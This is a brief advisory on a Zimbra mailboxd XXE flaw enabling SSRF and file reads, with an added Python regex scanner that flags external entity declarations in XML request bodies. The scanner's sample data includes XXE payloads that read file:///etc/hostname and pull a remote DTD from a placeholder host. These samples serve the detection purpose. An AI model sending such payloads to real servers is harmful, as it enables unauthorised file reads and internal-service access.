Zimbra XXE enabling SSRF and file read — exploited to steal admin credentials and access internal services. Apply Zimbra patches immediately. Disable XML external entity processing in Zimbra mailboxd. Monitor for unusual outbound HTTP from mail servers.
Synacor Zimbra Collaboration Suite before 8.7.12 has an XXE vulnerability in XML processing in the mailboxd component, which can be used to obtain SSRF and arbitrary file reads.
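To complement the outbound-HTTP monitoring advice on the inbound side, here is an added example (not Zimbra code and not part of the original advisory): a regex-only scanner that flags external DTD and external entity declarations in captured XML request bodies and labels each by the two outcomes named above, file read or SSRF. The function names, the sample bodies and the 192.0.2.10 address are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# External identifier: SYSTEM "uri"  or  PUBLIC "pubid" "uri".
_EXT_ID = r"""(?:SYSTEM|PUBLIC\s+(?:"[^"]*"|'[^']*'))\s+(?P<q>["'])(?P<uri>.*?)(?P=q)"""
# <!ENTITY name ...> and the parameter form <!ENTITY % name ...>.
ENTITY_RE = re.compile(r"<!ENTITY\s+(?P<param>%\s+)?(?P<name>[^\s>]+)\s+" + _EXT_ID, re.I | re.S)
# External DTD subset: <!DOCTYPE root SYSTEM "uri">.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\s+(?P<name>[^\s\[>]+)\s+" + _EXT_ID, re.I | re.S)


def classify(uri):
    """Map the system identifier to the impact it would have if resolved."""
    scheme = urlparse(uri).scheme.lower()
    if scheme in ("http", "https", "ftp"):
        return "ssrf"        # the server would make a network request
    if scheme in ("", "file"):
        return "file-read"   # the server would open a local path
    return "other"


def find_external_entities(body):
    """Return one finding per external DTD or external entity declaration.
    The body is only pattern-matched, never handed to an XML parser."""
    findings = []
    for regex in (DOCTYPE_RE, ENTITY_RE):
        for m in regex.finditer(body):
            if regex is DOCTYPE_RE:
                kind = "external-dtd"
            else:
                kind = "parameter-entity" if m["param"] else "general-entity"
            findings.append({"kind": kind, "name": m["name"],
                             "uri": m["uri"], "risk": classify(m["uri"])})
    return findings


# Constructed sample request bodies (not taken from any real capture).
SAMPLES = {
    "benign": '<?xml version="1.0"?><request><name>alice</name></request>',
    "file": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/hostname">]><r>&x;</r>',
    "remote": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % d SYSTEM "http://192.0.2.10/e.dtd"> %d;]><r/>',
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, find_external_entities(body))
```

The match runs on decoded text, so bodies in other encodings such as UTF-16 must be decoded before scanning. Patching and disabling external entity processing remain the actual control; this only surfaces requests worth reviewing.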